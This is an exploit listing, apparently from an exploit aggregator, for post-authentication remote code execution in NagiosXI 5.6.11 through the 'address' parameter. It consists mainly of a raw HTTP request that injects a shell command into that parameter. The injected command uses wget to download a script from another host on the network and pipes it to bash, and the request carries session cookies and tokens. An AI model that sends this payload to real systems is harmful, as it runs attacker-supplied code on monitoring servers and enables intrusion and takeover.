Share
## https://sploitus.com/exploit?id=PACKETSTORM:157174
# Title: Postauth RCE in NagiosXI 5.6.11 (param: address)
# Date: 13.03.2020
# Vendor: https://www.nagios.com/
# Vulnerable software: https://www.nagios.com/downloads/nagios-xi/vmware/
# Repo: https://github.com/c610/free/
GET /nagiosxi/includes/components/ccm/command_test.php?cmd=test&token=300de1b8ae47ed0dd96a837937df8eff&mode=test&address=127.0.0.1||(wget%20http://192.168.1.170/a.sh|bash%20a.sh);%23&cid=12&arg1=20%25&arg2=10%25&arg3=%2F&arg4=&arg5=&arg6=&arg7=&arg8=&nsp=912a3da8396db75e6fc275f556a6f076b4c830a4c3ec4c17a16771b704ea8bbe HTTP/1.1
Host: 192.168.1.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://192.168.1.10/nagiosxi/includes/components/ccm/?cmd=modify&type=service&id=2&page=1&returnUrl=index.php
Cookie: nagiosxi=4usi1041slmu9064dfqfo9c502